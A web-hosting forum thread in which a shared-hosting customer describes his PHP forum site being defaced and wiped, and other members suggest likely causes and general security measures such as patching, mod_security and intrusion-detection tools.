one day i got up and my front page(index.php) was modified and it was a page of blackened and red letter saids paw3d and the site name was http://www.intikam.org and signed with the name who hacked us. anyone had ever heard of any 1and1 customer had been hacked this way? do you know in what way they might have hacked me? would it be the problem with my code? wich is written simply in php and with smf setted up(couldn't say more), but i doubt it. it doesn't have ftp access info from there. and my passwords aren't possible to guessed. would it be a 1and1 server vaulnerability? If you know the way how they've hacked me and how i should prevent please let me know, prefferably by pming. thanks.

It was more than likely your PHP script / code. This has happened to others too. Ensure that your script is up-to-date with the latest release and any security patches.

What is your site name and what script(s) are you running on it?

no it wasn't it was a horrorble experience:-x , almost the whole site had been deleted, no more files, only emplty folders and even the folders had been deleted, we recreat then they delete again, we found some ip from turkish, only http access, mirror, defacement etc only found http access from them, no ftp access, must be 1and1 security whole, this guys are serious, and i am hesitated to mention the rest on a public forum, i whish to be pmed or so. or if you wish to help me, if you had hacking or security skills, and are kind enough. please left me a pm or a note under indicating u want to help me. i'll pm u back thx so much.

I wouldn't call it a 1and1 security hole. It come with the territory of operating a dedicated server on your own. Your best option is to probably wipe the server clean with a reimage and restore from a known good backup unless that's not an option. If it's not a script vulnerability then they gained access through some other service running on your server you might consider running APF/BFD, chkrootkit, rkhunter, portsentry, hostsentry, tripwire, and/or snort that could email you real time alerts of suspicious activity.

and my passwords aren't possible to guessed.

First off, there is no such thing as 100% secure. And you can tell yourself that your password is secure but... well, let's just say there's people out there who eat secure passwords for lunch. Your passwords may not be guessable but I guarantee they can be cracked if given enough time.

Second, security is best done in layers. Make certain you're running the latest version of your software. If you write your own, examine your logs and see what, if anything, was done to break your script. If you don't verify user data strictly you invite attacks. Another beneficial security layer is mod_security. It sits inside Apache and can help prevent cross scripting attacks and such. If your loophole was indeed HTTP this may very well close it for you.

Just as a little update... It would seem that penth doesn't have a dedicated server but has a shared basic account with 1and1.

I spoke with him last night via AIM and took a look around for him. He's running SMF Forums with some front end script that he and his partner wrote themselves. From everything I've seen, it was definately something in the scripting that allowed the attacker(s) in. There was also no .htaccess either.

actually there is .htacess file, it just got deleted, and my partner had tried your method of blocking ips. via test he was able to block my ip for http access. but for now, i had removed every file in the server and almove recreated from scratch, and it don't seemed to be attacked anymore. so it might be a security hole in my site script, but i also heard rumor from that hacker's provided site that some of them were being hacked, if that is the case. Then we might be just lucky, and the access log indicates that there is only http access and NO ftp access from the hackers(ip was tracked about 10+ of them from turkey)i'm not sure if there are any other ports aside from 21 and 80 so if there is more attack i'll post my updates here. I hope it's not a 1and1 security hole since i really liked the 1and1's connection power, tho it's admin/web control panel sucks; if it is a security hole of 1and1 itself how would i know? what would it look like? and thx to C-4 Hosting's help, really appreciated. I'll try the program provided by eWebtricity thx for all your replies!

p.s: is aside from eWebtricity's suggestion, is there any web based monitoring script that you guys can suggest? such as php based. since this is a shared hosting and i had very little control to the system, but if it's php based, i am afraid once my site is hacked again this program will be hacked too, since the hacker is like having full access to my ftp(even tho he had never gained access to ftp) he can delete and create as he wish. is there anyone know how this hack works, what limitation he had, he seem like he cannot alter the .htaccess file but he do, how ever can deleted the whole directory even the .htaccess is in it. according to the site that the hacker had posted his "triumph" of "hacked sites" it's called defacement and mirroring if anyone had heard of it please let me know any info that you can find. how does it work and how you make it to work.